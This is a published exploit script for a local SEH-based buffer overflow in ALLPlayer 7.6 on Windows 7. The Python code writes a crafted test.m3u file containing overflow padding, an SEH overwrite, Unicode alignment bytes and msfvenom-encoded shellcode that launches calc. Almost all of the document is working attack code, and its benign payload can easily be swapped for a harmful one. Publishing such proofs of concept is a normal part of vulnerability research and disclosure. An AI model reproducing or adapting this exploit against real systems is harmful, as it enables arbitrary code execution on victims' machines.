ALLPlayer 7.6 Buffer Overflow Exploit

# Exploit Title: ALLPlayer v7.6 Local Buffer Overflow (SEH)(Unicode)
# Version: 7.6
# Exploit Author: Xenofon Vassilakopoulos
# Tested on: Windows 7 Home Premium SP1 x86

# Steps to reproduce :
# 1. generate the test.m3u using this exploit 
# 2. open ALLPlayer then go to Open audio file 
# 3. load the test.m3u file 
# 4. calc
  
filename = "test.m3u"

junk="A"*301

nseh = "\x61\x6e" # popad align
seh = "\x12\x74"  # pop ebx # pop ebp # ret 0x04 


align=("\x56"           # push esi
       "\x6e"           # venetian shellcode
       "\x58"           # pop eax
       "\x6e"           # venetian shellcode
     "\x05\x19\x11"   # add eax,0x11001900
     "\x6e"       # venetian shellcode 
       "\x2d\x16\x11"   # sub eax,0x11001600
       "\x6e"       # venetian shellcode 
       "\x50"       # push eax
       "\x6e"       # venetian shellcode 
       "\xc3"       # retn
     )

nop="\x90"*45

# msfvenom -p windows/exec CMD=calc -e x86/unicode_mixed BufferRegister=EAX -f python
shellcode=  b""
shellcode+= b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
shellcode+= b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode+= b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
shellcode+= b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
shellcode+= b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
shellcode+= b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
shellcode+= b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
shellcode+= b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
shellcode+= b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
shellcode+= b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x69\x58\x62\x62"
shellcode+= b"\x49\x70\x69\x70\x4d\x30\x71\x50\x63\x59\x48\x65\x6e"
shellcode+= b"\x51\x57\x50\x52\x44\x54\x4b\x32\x30\x6e\x50\x54\x4b"
shellcode+= b"\x72\x32\x6a\x6c\x54\x4b\x70\x52\x6d\x44\x72\x6b\x61"
shellcode+= b"\x62\x6f\x38\x4a\x6f\x45\x67\x4e\x6a\x6d\x56\x4d\x61"
shellcode+= b"\x69\x6f\x34\x6c\x4f\x4c\x51\x51\x53\x4c\x79\x72\x4c"
shellcode+= b"\x6c\x6d\x50\x66\x61\x58\x4f\x4c\x4d\x59\x71\x67\x57"
shellcode+= b"\x38\x62\x39\x62\x62\x32\x6e\x77\x74\x4b\x4e\x72\x4c"
shellcode+= b"\x50\x34\x4b\x50\x4a\x4f\x4c\x72\x6b\x30\x4c\x4e\x31"
shellcode+= b"\x51\x68\x38\x63\x61\x38\x79\x71\x36\x71\x70\x51\x62"
shellcode+= b"\x6b\x71\x49\x6b\x70\x69\x71\x66\x73\x54\x4b\x31\x39"
shellcode+= b"\x6c\x58\x37\x73\x6e\x5a\x6e\x69\x32\x6b\x6e\x54\x64"
shellcode+= b"\x4b\x5a\x61\x59\x46\x50\x31\x49\x6f\x74\x6c\x69\x31"
shellcode+= b"\x48\x4f\x6a\x6d\x7a\x61\x59\x37\x70\x38\x59\x50\x61"
shellcode+= b"\x65\x4a\x56\x4c\x43\x71\x6d\x4c\x38\x6d\x6b\x43\x4d"
shellcode+= b"\x4f\x34\x42\x55\x67\x74\x31\x48\x44\x4b\x32\x38\x4c"
shellcode+= b"\x64\x6b\x51\x5a\x33\x61\x56\x62\x6b\x6c\x4c\x6e\x6b"
shellcode+= b"\x44\x4b\x6f\x68\x4b\x6c\x7a\x61\x6a\x33\x64\x4b\x6b"
shellcode+= b"\x54\x52\x6b\x49\x71\x36\x70\x42\x69\x4e\x64\x6b\x74"
shellcode+= b"\x6f\x34\x6f\x6b\x61\x4b\x51\x51\x72\x39\x4f\x6a\x4f"
shellcode+= b"\x61\x59\x6f\x47\x70\x71\x4f\x4f\x6f\x4e\x7a\x32\x6b"
shellcode+= b"\x6e\x32\x4a\x4b\x52\x6d\x61\x4d\x72\x4a\x6a\x61\x32"
shellcode+= b"\x6d\x42\x65\x75\x62\x49\x70\x79\x70\x4b\x50\x62\x30"
shellcode+= b"\x52\x48\x4d\x61\x72\x6b\x42\x4f\x35\x37\x49\x6f\x4a"
shellcode+= b"\x35\x37\x4b\x6c\x30\x64\x75\x53\x72\x61\x46\x31\x58"
shellcode+= b"\x45\x56\x56\x35\x45\x6d\x33\x6d\x49\x6f\x59\x45\x4f"
shellcode+= b"\x4c\x59\x76\x73\x4c\x6a\x6a\x75\x30\x69\x6b\x47\x70"
shellcode+= b"\x30\x75\x7a\x65\x35\x6b\x4e\x67\x7a\x73\x50\x72\x52"
shellcode+= b"\x4f\x6f\x7a\x69\x70\x30\x53\x49\x6f\x6a\x35\x51\x53"
shellcode+= b"\x70\x61\x32\x4c\x6f\x73\x49\x70\x41\x41"

payload=junk+nseh+seh+align+nop+shellcode

fill="D"*(5000-len(payload))

payload+=fill
f=open(filename,"wb")
f.write('http://'+payload)
print "\nFile created with %d bytes" % len(payload)
f.close()